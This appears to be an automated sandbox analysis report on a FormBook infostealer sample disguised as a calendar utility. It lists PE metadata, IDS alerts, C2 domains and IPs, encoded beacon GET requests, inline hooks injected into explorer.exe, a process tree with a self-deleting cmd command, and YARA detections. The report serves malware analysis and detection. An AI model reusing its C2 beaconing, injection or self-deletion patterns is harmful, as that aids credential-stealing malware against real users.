                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa889c0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x660.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xa69040xa6a00False0.752005872562data7.61448564553IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xaa0000x6600x800False0.34375data3.56461831417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0xaa0900x3cedata
                                                          RT_MANIFEST0xaa4700x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightBest Products All rights reserved
                                                          Assembly Version253.13.3.4
                                                          InternalNameFileBasedResourceGrovel.exe
                                                          FileVersion253.13.2.1
                                                          CompanyNameBest Products
                                                          LegalTrademarks
                                                          CommentsCalendar ID Sorter
                                                          ProductNameCalendarId
                                                          ProductVersion253.13.2.1
                                                          FileDescriptionCalendarId
                                                          OriginalFilenameFileBasedResourceGrovel.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          09/27/21-14:38:10.694045TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.4
                                                          09/27/21-14:38:33.068380TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:33.068380TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:33.068380TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:53.983274TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222
                                                          09/27/21-14:38:53.983274TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222
                                                          09/27/21-14:38:53.983274TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:38:10.566497087 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.578932047 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.579289913 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.579485893 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.592395067 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694045067 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694066048 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694550037 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.694581985 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.707451105 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:33.035368919 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.068085909 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.068351030 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.068380117 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.100491047 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161304951 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161334038 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161528111 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.161612034 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.195811033 CEST804982235.246.6.109192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:36:40.136929035 CEST5802853192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:36:40.156522036 CEST53580288.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:11.329107046 CEST5309753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:11.356400013 CEST53530978.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:30.264050007 CEST4925753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:30.278074980 CEST53492578.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:30.835949898 CEST6238953192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:30.849351883 CEST53623898.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:31.351696968 CEST4991053192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:31.370544910 CEST53499108.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:31.928380966 CEST5585453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:31.995811939 CEST53558548.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:33.098720074 CEST6454953192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:33.111721992 CEST53645498.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:36.748505116 CEST6315353192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:36.783879042 CEST53631538.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:37.221718073 CEST5299153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:37.234687090 CEST53529918.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:37.997941971 CEST5370053192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:38.012214899 CEST53537008.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:39.414196014 CEST5172653192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:39.427916050 CEST53517268.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:40.775157928 CEST5679453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:40.848000050 CEST53567948.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:42.119669914 CEST5653453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:42.132577896 CEST53565348.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:42.506829023 CEST5662753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:42.520287037 CEST53566278.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:59.524534941 CEST5662153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:59.546118021 CEST53566218.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:10.523931026 CEST6311653192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:10.554481983 CEST53631168.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:32.964072943 CEST6407853192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:33.026504993 CEST53640788.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:34.101455927 CEST6480153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:34.143057108 CEST53648018.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:35.062074900 CEST6172153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:35.075623035 CEST53617218.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:53.311139107 CEST5125553192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:53.792260885 CEST53512558.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Sep 27, 2021 14:38:10.523931026 CEST192.168.2.48.8.8.80x9a2fStandard query (0)www.noseainsight.comA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:32.964072943 CEST192.168.2.48.8.8.80xb0aeStandard query (0)www.dorotajedrusik.comA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:53.311139107 CEST192.168.2.48.8.8.80x3b62Standard query (0)www.healthyweathorganics.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Sep 27, 2021 14:38:10.554481983 CEST8.8.8.8192.168.2.40x9a2fNo error (0)www.noseainsight.comnoseainsight.comCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:10.554481983 CEST8.8.8.8192.168.2.40x9a2fNo error (0)noseainsight.com34.102.136.180A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)www.dorotajedrusik.comwww39.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)www39.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:53.792260885 CEST8.8.8.8192.168.2.40x3b62No error (0)www.healthyweathorganics.com47.91.170.222A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.noseainsight.com
                                                          • www.dorotajedrusik.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.44982134.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:38:10.579485893 CEST7759OUTGET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1
                                                          Host: www.noseainsight.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Sep 27, 2021 14:38:10.694045067 CEST7760INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 27 Sep 2021 12:38:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "6139ed55-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.44982235.246.6.10980C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:38:33.068380117 CEST7762OUTGET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1
                                                          Host: www.dorotajedrusik.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Sep 27, 2021 14:38:33.161304951 CEST7763INHTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 27 Sep 2021 12:38:33 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          location: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad
                                                          strict-transport-security: max-age=120
                                                          x-wix-request-id: 1632746313.084195257051119681
                                                          Age: 0
                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVg06c/s992xw2H1Lb8Cr0s7,qquldgcFrj2n046g4RNSVIYbithkq29Tk42QMl6f1yxYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalikT1tdHuwj9E+rXAjW8B/P35A2sqaSJufFReCt4dMF+3fKEXQvQlSAkB/lstal9R2CG0kkNBHquE4+qMuMAjUE=,2UNV7KOq4oGjA5+PKsX47LzXc1eZTFhpHbyqmhw2pKBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBWZqev46kXM4E2cIaE690MeTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv4V+sXmuE8NPLw49WzYM4E1NJqc9MWi42+zQj+YE0ChkSYblWJ1+I4NCiXX+q5JMPA==
                                                          Cache-Control: no-cache
                                                          X-Content-Type-Options: nosniff
                                                          Server: Pepyaka/1.19.10


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          PeekMessageAINLINEexplorer.exe
                                                          PeekMessageWINLINEexplorer.exe
                                                          GetMessageWINLINEexplorer.exe
                                                          GetMessageAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: z7d1ehQQQW.exe PID: 984 Parent PID: 1572

                                                          General

                                                          Start time:14:36:44
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\z7d1ehQQQW.exe'
                                                          Imagebase:0x860000
                                                          File size:685568 bytes
                                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: z7d1ehQQQW.exe PID: 5800 Parent PID: 984

                                                          General

                                                          Start time:14:36:55
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Imagebase:0xe90000
                                                          File size:685568 bytes
                                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 5800

                                                          General

                                                          Start time:14:36:57
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: cscript.exe PID: 6944 Parent PID: 3424

                                                          General

                                                          Start time:14:37:21
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cscript.exe
                                                          Imagebase:0x1c0000
                                                          File size:143360 bytes
                                                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 6480 Parent PID: 6944

                                                          General

                                                          Start time:14:37:25
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 5072 Parent PID: 6480

                                                          General

                                                          Start time:14:37:26
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: z7d1ehQQQW.exe PID: 984 Parent PID: 1572 z7d1ehQQQW.exeCOMMON

                                                            Executed Functions

                                                            Function 02A8DDCC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A8FE0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 20ae71596ae54c4aa2952e0772941b1099119762f9565b8a2c8c7130dcfc85a1
                                                            • Instruction ID: 4e8ce7334d588f9bdb849c6dc038247d899e4154f61fbaaefea508ce024649f5
                                                            • Opcode Fuzzy Hash: 20ae71596ae54c4aa2952e0772941b1099119762f9565b8a2c8c7130dcfc85a1
                                                            • Instruction Fuzzy Hash: EF51C0B1D003099FDB14DF99C884ADEBBB5FF88314F64812AE819AB210DB749945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A85365, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02A85421
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: aa4caa440f155bcb3b225795ab9e5b2ede4a7b4b03f80451e14f59c65a024db5
                                                            • Instruction ID: 4f57c493697f5b172ca43ad8b5fcbe36f9d745dfcd3ffdd3c9d98cd6c2059014
                                                            • Opcode Fuzzy Hash: aa4caa440f155bcb3b225795ab9e5b2ede4a7b4b03f80451e14f59c65a024db5
                                                            • Instruction Fuzzy Hash: AA41D275C00619CFDB14DFA9C9847CEBBB5BF88308F608469D409BB251DBB5594ACF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A83DE8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02A85421
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: b72f8c8010bd6cf9345009dcf91171dd769fe065286946b2a5766158c9b2818d
                                                            • Instruction ID: e7bc983e1520ca2497ee6eff3688e25bd3b22b7e47ed69a843467f4e60c9e652
                                                            • Opcode Fuzzy Hash: b72f8c8010bd6cf9345009dcf91171dd769fe065286946b2a5766158c9b2818d
                                                            • Instruction Fuzzy Hash: 7041D070C04618CBDB24DFA9C884BCEBBB5BF88308F618069D409BB251DBB56945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A89800, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A8B87E,?,?,?,?,?), ref: 02A8B93F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.676043334.0000000002A80000.00000040.00000001.sdmp, Offset: 02A80000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 4141f06fb83cf0d242b5f3404fc71f8b4354e5162f3e9df8ce967b681665531b
                                                            • Instruction ID: 4832a66c7311b2b755f7a859e45d8b241f9974f8735a3e204a008eb3d9cc12b3
                                                            • Opcode Fuzzy Hash: 4141f06fb83cf0d242b5f3404fc71f8b4354e5162f3e9df8ce967b681665531b
                                                            • Instruction Fuzzy Hash: 0821B3B5900219EFDB10CFA9D584ADEBBF8FB48324F14841AE914B7350D778A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

